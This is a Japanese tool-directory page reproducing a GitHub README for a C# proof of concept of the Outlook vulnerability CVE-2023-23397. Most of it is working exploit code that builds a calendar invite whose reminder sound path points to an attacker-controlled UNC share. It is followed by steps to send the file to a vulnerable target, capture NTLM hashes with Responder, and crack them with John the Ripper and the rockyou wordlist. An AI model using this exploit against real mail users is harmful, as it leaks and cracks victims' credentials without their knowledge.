Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2023-23397 — CVE-2023-23397 C# PoC | Kitploit
ツール/GitHubGitHub/moneertv/cve-2023-23397
パスワードクラッキングフィッシングツール偵察ペイロード生成脆弱性分析エクスプロイト
GitHubmoneertv/cve-2023-23397

CVE-2023-23397

CVE-2023-23397 C# PoC

リポジトリを見る
13年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2023-23397

CVE-2023-23397 C# PoC 1- msgkit をダウンロードする 2- appointment クラスを編集し、以下を追加する: image

3- プロジェクト内に新しいクラスを作成して、msg ファイルのプロパティを設定する:

root@kitploit:~
using MsgKit.Enums;
using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
using System.Threading.Tasks;

namespace MsgKit
{
    class Program
    {
        static void Main(string[] args)
        {
            using (var appointment = new Appointment(
            new Sender("[email protected]", "moneertv"),
            new Representing("[email protected]", "moneertv"),
            "CVE-2023-23397"))
            {
                appointment.Recipients.AddTo("[email protected]", "muneer aqraa");
                appointment.Subject = "CVE-2023-23397";
                appointment.Location = "Neverland";
                appointment.MeetingStart = DateTime.Now.Date.AddDays(2).Date;
                appointment.MeetingEnd = DateTime.Now.Date.AddDays(3).Date;
                appointment.AllDay = true;
                appointment.BodyText = "CVE-2023-23397";
                appointment.BodyHtml = "<html><head></head><body><b>testing CVE-2023-23397</b></body></html>";
                appointment.SentOn = DateTime.UtcNow;
                appointment.Importance = MessageImportance.IMPORTANCE_NORMAL;
                appointment.IconIndex = MessageIconIndex.UnsentMail;

                appointment.PidLidReminderFileParameter = @"\\192.168.1.222\";
                appointment.PidLidReminderOverride = true;

                appointment.Save(@"C:\Users\Moneer\Desktop\exploits\CVE-2023-23397\MsgKit-master\generated email msg\dirty.msg");

            }

        }
    }
}

4- プロジェクトの出力タイプをコンソールに変更する: image

5- プロジェクトを実行して dirty.msg を生成する

6- メッセージを脆弱なターゲットに送信し、会議のリマインダーが起動するのを待つ

6-2- 待っている間、メインクラスに IP を設定した Kali マシン上で、以下のコマンドを実行して、罠にかかった人がいないかリッスンを続ける: # responder -I eth0 -v

7- ハッシュを入手したら、それらをファイルに保存し、ハッシュに対してワードリスト(例: rockyou)を使って john ripper を実行する

ツールをダウンロード